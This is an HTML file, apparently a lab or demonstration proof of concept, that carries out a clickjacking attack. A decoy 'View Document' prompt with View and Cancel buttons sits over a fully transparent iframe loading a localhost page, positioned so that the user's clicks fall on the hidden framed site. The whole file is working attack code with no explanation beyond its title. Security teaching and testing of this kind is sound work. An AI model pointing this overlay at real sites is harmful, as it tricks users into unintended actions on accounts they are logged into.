<!DOCTYPE html>
<html>
    <title>Don't get clickjacked!</title>
    <head>
        <style>
            h1,h2 {
                font-family: sans-serif;
                color: #fff;
                margin-bottom: 62px;
            }
            h2 {
                font-weight: normal;
            }
            body {
                overflow: hidden;
            }
            #wrap iframe {
                position: absolute;
                top: -200px;
                bottom: 0;
                left: 0;
                right: 0;
                border: 0;
            }
            iframe {
                opacity: 0;
            }
            #wrap {
                background: #303030;
            }
            #wrap div {
                position: absolute;
                top: 300px;
                left: 110px;
            }
        </style>
    </head>
    <body>
        <div id="wrap">
            <div>
                <h1>View Document</h1>
                <h2>To view this document, click the button below</h2>
                <button>View</button>
                <button>Cancel</button>
            </div>
        </div>
        <iframe position="absolute" top="70px" width="100%" height="1000px" src="http://localhost/clickjacking.php" frameborder="0"></iframe>
    </body>
</html>